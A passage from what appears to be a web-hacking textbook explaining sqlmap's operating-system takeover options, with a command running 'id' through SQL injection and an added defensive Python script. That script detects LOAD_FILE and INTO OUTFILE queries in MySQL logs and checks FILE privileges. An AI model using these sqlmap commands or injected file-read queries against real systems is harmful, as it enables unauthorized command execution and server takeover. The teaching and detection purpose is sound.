Web Hacking ◾ 369
Operating System Takeover with Sqlmap
There are various commands in sqlmap that would allow you to execute system commands upon the underlying operating system. From the sqlmap help menu, under the operating system section, we can find the following commands:
    --os-cmd=OSCMD      Execute an operating system command
    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an out-of-band shell, meterpreter, or VNC
    --os-smbrelay       One-click prompt for an OOB shell, meterpreter, or VNC
    --os-bof            Stored procedure buffer overflow exploitation
    --priv-esc          Database process user privilege escalation
    --msf-path=         Path where Metasploit Framework 3 is installed
    --tmp-path=         Remote absolute path of temporary files directory
We will discuss the first three commands next.
OS-CMD
The os-cmd option can be used to execute commands on the target operating system by using the LOAD_FILE function that we discussed earlier. Let's try executing the id command; we will issue the following command from sqlmap:

    ./sqlmap.py -u http://localhost/?support=yes --os-cmd=id

The id command in Linux displays information about the current user, such as the username, user ID, and group ID.
[Figure: output of the successful execution of the command]
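As an added example (not code from the book or from the sqlmap project), the following Python script takes the defender's view of the technique just described. It flags MySQL general-query-log entries that use the server-side file primitives an injected command-execution attempt depends on (LOAD_FILE(), which the text names, and INTO OUTFILE / INTO DUMPFILE, which is standard MySQL syntax), and it checks whether the server's secure_file_priv setting and the application account's FILE privilege would let such queries succeed at all. The log lines and GRANT statements are constructed for the example, and the choice of detection patterns is my own assumption about what to look for.

```python
"""Added example, not code from the book or the sqlmap project: flag MySQL
queries that use the server-side file primitives the text ties to os-cmd
(LOAD_FILE() is named in the text; INTO OUTFILE / INTO DUMPFILE is standard
MySQL syntax) and check whether the server configuration lets them work."""
import re

# Constructed MySQL general-query-log excerpt (not a real capture). Format:
# timestamp, connection id, command type, argument, tab/space separated.
SAMPLE_GENERAL_LOG = """\
2024-05-01T12:00:01.000000Z\t   17 Connect\tsupport@localhost on helpdesk using TCP/IP
2024-05-01T12:00:01.100000Z\t   17 Query\tSELECT * FROM tickets WHERE support='yes'
2024-05-01T12:00:02.300000Z\t   17 Query\tSELECT * FROM tickets WHERE support='yes' UNION SELECT LOAD_FILE('/etc/hostname')
2024-05-01T12:00:03.200000Z\t   17 Query\tSELECT 'probe' INTO OUTFILE '/tmp/probe.txt'
2024-05-01T12:00:05.000000Z\t   18 Query\tSELECT id, title FROM tickets LIMIT 10
"""

LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<conn>\d+)\s+(?P<cmd>\w+)\s*(?P<arg>.*)$")

# Query fragments that only make sense for reading or writing server-side files
# (assumed detection patterns; extend them for your own environment).
FILE_PRIMITIVES = {
    "file-read": re.compile(r"\bLOAD_FILE\s*\(", re.IGNORECASE),
    "file-write": re.compile(r"\bINTO\s+(?:OUTFILE|DUMPFILE)\b", re.IGNORECASE),
}


def parse_general_log(text):
    """Split general-log lines into timestamp, connection id, command, argument."""
    events = []
    for line in text.splitlines():
        match = LOG_LINE.match(line)
        if match:
            events.append(match.groupdict())
    return events


def flag_file_primitives(text):
    """Return one finding per Query event that touches server-side files."""
    findings = []
    for event in parse_general_log(text):
        if event["cmd"] != "Query":
            continue
        for kind, pattern in FILE_PRIMITIVES.items():
            if pattern.search(event["arg"]):
                findings.append({"ts": event["ts"], "conn": event["conn"],
                                 "kind": kind, "query": event["arg"]})
    return findings


def assess_file_access(secure_file_priv, grants):
    """Combine the two server-side gates on LOAD_FILE() / INTO OUTFILE.

    secure_file_priv: value of the MySQL system variable as SHOW VARIABLES
        reports it: None for NULL (file I/O disabled), "" for unrestricted,
        or a directory path the server confines file I/O to.
    grants: GRANT statements as printed by SHOW GRANTS for the application account.
    """
    has_file_privilege = False
    for grant in grants:
        match = re.match(r"GRANT\s+(.*?)\s+ON\s", grant, re.IGNORECASE)
        if not match:
            continue
        privileges = match.group(1).upper()
        if privileges == "ALL" or "ALL PRIVILEGES" in privileges \
                or re.search(r"\bFILE\b", privileges):
            has_file_privilege = True
    if secure_file_priv is None:
        scope = "disabled"
    elif secure_file_priv == "":
        scope = "unrestricted"
    else:
        scope = "limited to " + secure_file_priv
    # File primitives need both the FILE privilege and a non-NULL secure_file_priv.
    risk = "high" if has_file_privilege and secure_file_priv is not None else "low"
    return {"file_privilege": has_file_privilege, "file_io": scope, "risk": risk}


if __name__ == "__main__":
    for f in flag_file_primitives(SAMPLE_GENERAL_LOG):
        print(f"{f['ts']} conn={f['conn']} {f['kind']}: {f['query']}")
    print(assess_file_access("", ["GRANT ALL PRIVILEGES ON *.* TO 'support'@'localhost'"]))
    print(assess_file_access("/var/lib/mysql-files/",
                             ["GRANT SELECT, INSERT ON helpdesk.* TO 'support'@'localhost'"]))
```

The two checks complement each other: the log scan tells you whether anyone has tried to reach the filesystem through the database, while the configuration check tells you whether the web application's account could have succeeded. An account that needs no FILE privilege should not hold it, and setting secure_file_priv to NULL removes the primitive entirely; either change takes the LOAD_FILE-based path described above away from an attacker even if the injection itself remains.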
OS-SHELL
The next option is os-shell, which gives an interactive shell so we can easily execute commands.